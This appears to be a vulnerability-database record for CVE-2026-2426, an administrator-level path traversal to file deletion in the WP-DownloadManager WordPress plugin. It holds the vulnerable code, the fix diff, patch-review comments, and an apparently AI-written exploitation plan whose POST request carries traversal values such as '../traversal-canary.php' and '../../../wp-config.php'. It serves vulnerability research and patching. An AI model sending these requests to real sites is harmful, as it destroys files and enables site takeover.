[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fwbkUVuvv5Y_Fs7EblLKtdjtkadN-UhZqBDi4yWHS2CQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":30,"research_vulnerable_code":31,"research_fix_diff":32,"research_exploit_outline":33,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":37},"CVE-2026-2426","wp-downloadmanager-authenticated-administrator-path-traversal-to-arbitrary-file-deletion-via-file-parameter","WP-DownloadManager \u003C= 1.69 - Authenticated (Administrator+) Path Traversal to Arbitrary File Deletion via 'file' Parameter","The WP-DownloadManager plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.69 via the 'file' parameter in the file deletion functionality. This is due to insufficient validation of user-supplied file paths, allowing directory traversal sequences. 
This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can lead to remote code execution when critical files like wp-config.php are deleted.","wp-downloadmanager",null,"\u003C=1.69","1.69.1","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:N\u002FI:H\u002FA:H","Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","2026-02-17 21:55:19","2026-02-18 10:20:51",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa3f791dd-7c24-45e3-b4f6-b8d7e594c568?source=api-prod",1,[22,23,24,25],"download-manager.php","download-options.php","readme.txt","wp-downloadmanager.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-2426 - WP-DownloadManager Path Traversal\n\n## 1. Vulnerability Summary\nWP-DownloadManager (\u003C= 1.69) contains a path traversal vulnerability in its file deletion functionality within `download-manager.php`. The plugin fails to validate or sanitize the `file` parameter against directory traversal sequences (e.g., `..\u002F`). This allows an authenticated administrator to delete arbitrary files on the server by traversing out of the configured download directory. Deleting critical files like `wp-config.php` can lead to site takeover or remote code execution by re-triggering the WordPress installation process.\n\n## 2. 
Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin.php?page=wp-downloadmanager\u002Fdownload-manager.php`\n*   **Method:** `POST`\n*   **Authentication:** Required (Administrator or user with `manage_downloads` capability).\n*   **Vulnerable Parameter:** `file`\n*   **Action Parameter:** `do` (Set to the localized string for \"Delete File\")\n*   **Nonce Parameter:** `_wpnonce` (Action: `wp-downloadmanager_delete-file`)\n*   **Precondition:** At least one download must exist in the system to easily retrieve a valid nonce and `file_id` from the management UI.\n\n## 3. Code Flow\n1.  **Entry Point:** The administrator accesses the \"Manage Downloads\" menu. `wp-downloadmanager.php` loads `download-manager.php`.\n2.  **Capability Check:** `download-manager.php` checks `current_user_can( 'manage_downloads' )`.\n3.  **Action Trigger:** The script checks `if(!empty($_POST['do']))`. If `$_POST['do']` matches the localized string for `Delete File` (e.g., `__('Delete File', 'wp-downloadmanager')`), it enters the deletion block.\n4.  **Nonce Verification:** It calls `check_admin_referer('wp-downloadmanager_delete-file')`.\n5.  **Path Resolution (The Sink):**\n    *   `$file_path = get_option( 'download_path' );` (Typically points to `wp-content\u002Fuploads\u002Fdownloads` or similar).\n    *   `$file_to_delete = $_POST['file'];` (User-controlled).\n    *   The plugin performs an `unlink($file_path . $file_to_delete)` or similar file operation without stripping `..\u002F` sequences.\n\n## 4. Nonce Acquisition Strategy\nThe nonce is required for the deletion action. Since this is an administrator-level exploit, we will use the `browser_eval` tool to extract the nonce from the \"Manage Downloads\" page.\n\n1.  **Navigate:** Use `browser_navigate` to `wp-admin\u002Fadmin.php?page=wp-downloadmanager\u002Fdownload-manager.php`.\n2.  **Identify Nonce:** The deletion forms are typically located in the downloads table. Each row has a \"Delete\" button.\n3.  
**Extraction JS:** \n    ```javascript\n    \u002F\u002F Find the hidden input with name '_wpnonce' inside a form that has 'Delete File' action\n    (function() {\n        const deleteBtn = Array.from(document.querySelectorAll('input[type=\"submit\"]')).find(el => el.value === 'Delete File');\n        if (deleteBtn && deleteBtn.form) {\n            return deleteBtn.form.querySelector('input[name=\"_wpnonce\"]').value;\n        }\n        return null;\n    })()\n    ```\n4.  **Note:** The `file_id` for a specific row can also be extracted from the same form (`input[name=\"file_id\"]`).\n\n## 5. Exploitation Strategy\n### Step 1: Authentication\nLog in as an Administrator using the provided credentials.\n\n### Step 2: Test Data Setup\nWe need a dummy file and a corresponding entry in the plugin to generate the management UI.\n1.  **Create Canary File:** `touch \u002Fvar\u002Fwww\u002Fhtml\u002Ftraversal-canary.php`\n2.  **Configure Download Path:** Ensure `download_path` is set to a known location via WP-CLI: `wp option update download_path \"\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\" --format=json`.\n3.  **Add Dummy Download:** \n    ```bash\n    wp db query \"INSERT INTO wp_downloads (file_name, file, file_size, file_date, file_updated_date, file_last_downloaded_date) VALUES ('Canary', 'canary.txt', 0, NOW(), NOW(), NOW());\"\n    ```\n\n### Step 3: Extract Nonce and ID\n1.  Navigate to `admin.php?page=wp-downloadmanager\u002Fdownload-manager.php`.\n2.  
Use `browser_eval` with the script in Section 4 to get the `_wpnonce` and `file_id`.\n\n### Step 4: Execution\nSend a POST request to delete the canary file at the root.\n\n*   **URL:** `https:\u002F\u002Ftarget.local\u002Fwp-admin\u002Fadmin.php?page=wp-downloadmanager\u002Fdownload-manager.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    do=Delete File&\n    file=..\u002Ftraversal-canary.php&\n    file_id=[EXTRACTED_ID]&\n    _wpnonce=[EXTRACTED_NONCE]\n    ```\n    *(Note: The `do` value must match the exact button text, usually \"Delete File\" in English).*\n\n## 6. Expected Results\n*   **Response:** The server should respond with a 200 OK and a message indicating the file was deleted (e.g., \"File Deleted\").\n*   **Side Effect:** The file `\u002Fvar\u002Fwww\u002Fhtml\u002Ftraversal-canary.php` will be removed from the filesystem.\n\n## 7. Verification Steps\n1.  **Check Filesystem:** Use WP-CLI to check if the canary file exists:\n    ```bash\n    ls \u002Fvar\u002Fwww\u002Fhtml\u002Ftraversal-canary.php\n    ```\n    (Expected: `ls: cannot access ... No such file or directory`)\n2.  **Check Database:** Verify the entry was also removed from the downloads table:\n    ```bash\n    wp db query \"SELECT * FROM wp_downloads WHERE file_name='Canary';\"\n    ```\n\n## 8. Alternative Approaches\nIf the \"Delete File\" action name is different due to translation:\n1.  Inspect the page source to find the value of the `input[type=\"submit\"]` button in the delete form.\n2.  
Use that value in the `do` parameter.\n\nIf the individual delete fails, check for **Bulk Actions**:\n*   The `do` parameter might be `Delete` with an array of `file_ids[]`.\n*   Check if the bulk delete logic also uses the `file` parameter directly.\n*   The primary traversal is documented to be in the `file` parameter during the `Delete File` case.","The WP-DownloadManager plugin for WordPress is vulnerable to arbitrary file deletion via path traversal in versions up to and including 1.69. Authenticated administrators can exploit the 'file' parameter during the file deletion process by including directory traversal sequences (e.g., ..\u002F), allowing them to delete critical system files like wp-config.php. Deletion of configuration files can reset the site and potentially lead to remote code execution during the re-installation process.","\u002F* download-manager.php lines 208-215 *\u002F\ncase __('Delete File', 'wp-downloadmanager');\n\tcheck_admin_referer('wp-downloadmanager_delete-file');\n\t$file_id  = ! empty( $_POST['file_id'] ) ? intval( $_POST['file_id'] ) : 0;\n\t$file = ! empty( $_POST['file'] ) ? sanitize_text_field( $_POST['file'] ) : '';\n\t$file_name = ! empty( $_POST['file_name'] ) ? sanitize_text_field( $_POST['file_name'] ) : '';\n\t$unlinkfile = ! empty( $_POST['unlinkfile'] ) ? 
intval( $_POST['unlinkfile'] ) : 0;\n\tif($unlinkfile == 1) {\n\t\tif(!unlink($file_path.$file)) {","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69\u002Fdownload-manager.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69.1\u002Fdownload-manager.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69\u002Fdownload-manager.php\t2024-08-19 13:32:44.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69.1\u002Fdownload-manager.php\t2026-02-13 01:54:04.000000000 +0000\n@@ -208,21 +213,20 @@\n \t\tcase __('Delete File', 'wp-downloadmanager');\n \t\t\tcheck_admin_referer('wp-downloadmanager_delete-file');\n \t\t\t$file_id  = ! empty( $_POST['file_id'] ) ? intval( $_POST['file_id'] ) : 0;\n-\t\t\t$file = ! empty( $_POST['file'] ) ? sanitize_text_field( $_POST['file'] ) : '';\n-\t\t\t$file_name = ! empty( $_POST['file_name'] ) ? sanitize_text_field( $_POST['file_name'] ) : '';\n+\t\t\t$file = $wpdb->get_row( $wpdb->prepare( \"SELECT * FROM $wpdb->downloads WHERE file_id = %d\", $file_id ) );\n \t\t\t$unlinkfile = ! empty( $_POST['unlinkfile'] ) ? intval( $_POST['unlinkfile'] ) : 0;\n-\t\t\tif($unlinkfile == 1) {\n-\t\t\t\tif(!unlink($file_path.$file)) {\n-\t\t\t\t\t$text = '\u003Cp style=\"color: red;\">'.sprintf(__('Error In Deleting File \\'%s (%s)\\' From Server', 'wp-downloadmanager'), $file_name, $file).'\u003C\u002Fp>';\n+\t\t\tif ( $unlinkfile === 1 ) {\n+\t\t\t\tif ( ! unlink( $file_path . $file->file ) ) {\n+\t\t\t\t\t$text = '\u003Cp style=\"color: red;\">' . sprintf( __( 'Error In Deleting File \\'%s (%s)\\' From Server', 'wp-downloadmanager' ), $file->file_name, $file->file ) . 
'\u003C\u002Fp>';\n \t\t\t\t} else {\n-\t\t\t\t\t$text = '\u003Cp style=\"color: green;\">'.sprintf(__('File \\'%s (%s)\\' Deleted From Server Successfully', 'wp-downloadmanager'), $file_name, $file).'\u003C\u002Fp>';\n+\t\t\t\t\t$text = '\u003Cp style=\"color: green;\">' . sprintf( __( 'File \\'%s (%s)\\' Deleted From Server Successfully', 'wp-downloadmanager' ), $file->file_name, $file->file ) . '\u003C\u002Fp>';\n \t\t\t\t}\n \t\t\t}\n-\t\t\t$deletefile = $wpdb->query(\"DELETE FROM $wpdb->downloads WHERE file_id = $file_id\");\n-\t\t\tif(!$deletefile) {\n-\t\t\t\t$text .= '\u003Cp style=\"color: red;\">'.sprintf(__('Error In Deleting File \\'%s (%s)\\'', 'wp-downloadmanager'), $file_name, $file).'\u003C\u002Fp>';\n+\t\t\t$deletefile = $wpdb->query( $wpdb->prepare( \"DELETE FROM $wpdb->downloads WHERE file_id = %d\", $file->file_id ) );\n+\t\t\tif ( ! $deletefile ) {\n+\t\t\t\t$text .= '\u003Cp style=\"color: red;\">' . sprintf( __('Error In Deleting File \\'%s (%s)\\'', 'wp-downloadmanager'), $file->file_name, $file->file) . '\u003C\u002Fp>';\n \t\t\t} else {\n-\t\t\t\t$text .= '\u003Cp style=\"color: green;\">'.sprintf(__('File \\'%s (%s)\\' Deleted Successfully', 'wp-downloadmanager'), $file_name, $file).'\u003C\u002Fp>';\n+\t\t\t\t$text .= '\u003Cp style=\"color: green;\">' . sprintf( __('File \\'%s (%s)\\' Deleted Successfully', 'wp-downloadmanager'), $file->file_name, $file->file) . 
'\u003C\u002Fp>';\n \t\t\t}\n \t\t\tbreak;\n \t}\n@@ -376,9 +380,7 @@\n \t\t\u003C?php if(!empty($text)) { echo '\u003C!-- Last Action -->\u003Cdiv id=\"message\" class=\"updated fade\">\u003Cp>'.stripslashes($text).'\u003C\u002Fp>\u003C\u002Fdiv>'; } ?>\n \t\t\u003C!-- Delete A File -->\n \t\t\u003Cform method=\"post\" action=\"\u003C?php echo admin_url('admin.php?page='.plugin_basename(__FILE__)); ?>\">\n-\t\t\t\u003Cinput type=\"hidden\" name=\"file_id\" value=\"\u003C?php echo intval($file->file_id); ?>\" \u002F>\n-\t\t\t\u003Cinput type=\"hidden\" name=\"file\" value=\"\u003C?php echo esc_attr( removeslashes( $file->file ) ); ?>\" \u002F>\n-\t\t\t\u003Cinput type=\"hidden\" name=\"file_name\" value=\"\u003C?php echo esc_attr( removeslashes( $file->file_name ) ); ?>\" \u002F>\n+\t\t\t\u003Cinput type=\"hidden\" name=\"file_id\" value=\"\u003C?php echo esc_attr( intval( $file->file_id ) ); ?>\" \u002F>\n \t\t\t\u003C?php wp_nonce_field('wp-downloadmanager_delete-file'); ?>\n \t\t\t\u003Cdiv class=\"wrap\">\n \t\t\t\t\u003Ch2>\u003C?php _e('Delete A File', 'wp-downloadmanager'); ?>\u003C\u002Fh2>","To exploit this vulnerability, an attacker must have Administrator access or the 'manage_downloads' capability. \n\n1. Log in to the WordPress dashboard and navigate to the 'Manage Downloads' section of the WP-DownloadManager plugin.\n2. Create or identify an existing download record to retrieve its `file_id` and a valid `_wpnonce` for the `wp-downloadmanager_delete-file` action.\n3. Send a POST request to `\u002Fwp-admin\u002Fadmin.php?page=wp-downloadmanager\u002Fdownload-manager.php` with the following parameters:\n   - `do`: The localized string for 'Delete File'.\n   - `file_id`: The ID of the identified download record.\n   - `unlinkfile`: Set to 1 (to trigger the file system deletion).\n   - `_wpnonce`: The extracted nonce value.\n   - `file`: A path traversal string targeting the sensitive file (e.g., `..\u002F..\u002F..\u002Fwp-config.php`).\n4. 
The plugin will concatenate the download directory path with the user-controlled traversal string and call `unlink()`, deleting the target file.","gemini-3-flash-preview","2026-04-19 05:34:11","2026-04-19 05:34:32",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","1.69","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-downloadmanager\u002Ftags\u002F1.69","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.69.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-downloadmanager\u002Ftags\u002F1.69.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-downloadmanager.1.69.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-downloadmanager\u002Ftags"]
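Review bot: in the first hunk (`@@ -208,21 +213,20 @@`) the row returned by `$wpdb->get_row( $wpdb->prepare( "SELECT * FROM $wpdb->downloads WHERE file_id = %d", $file_id ) )` is dereferenced as `$file->file`, `$file->file_name` and `$file->file_id` without a null check, so a missing or zero `file_id` makes `unlink( $file_path . $file->file )` act on `$file_path` alone and the `DELETE ... WHERE file_id = %d` run with id 0. Suggest guarding right after the lookup, e.g. `if ( ! $file ) { $text = '<p style="color: red;">...</p>'; break; }`, and, since the stored `file` column is now the only input to `unlink()`, also confirming that `realpath( $file_path . $file->file )` still lies under `realpath( $file_path )` before deleting, so a bad database value cannot reintroduce the traversal the patch removes from `$_POST['file']`.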
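Review bot: in the second hunk (`@@ -376,9 +380,7 @@`) the remaining hidden input wraps an integer as `esc_attr( intval( $file->file_id ) )`; `intval()` already yields a plain integer, so `esc_attr()` is redundant here, though harmless. Dropping the hidden `file` and `file_name` inputs is the right complement to the server-side lookup, but it is worth a short changelog or readme.txt note that the delete form no longer accepts those fields, since the diff touches readme.txt without recording that change.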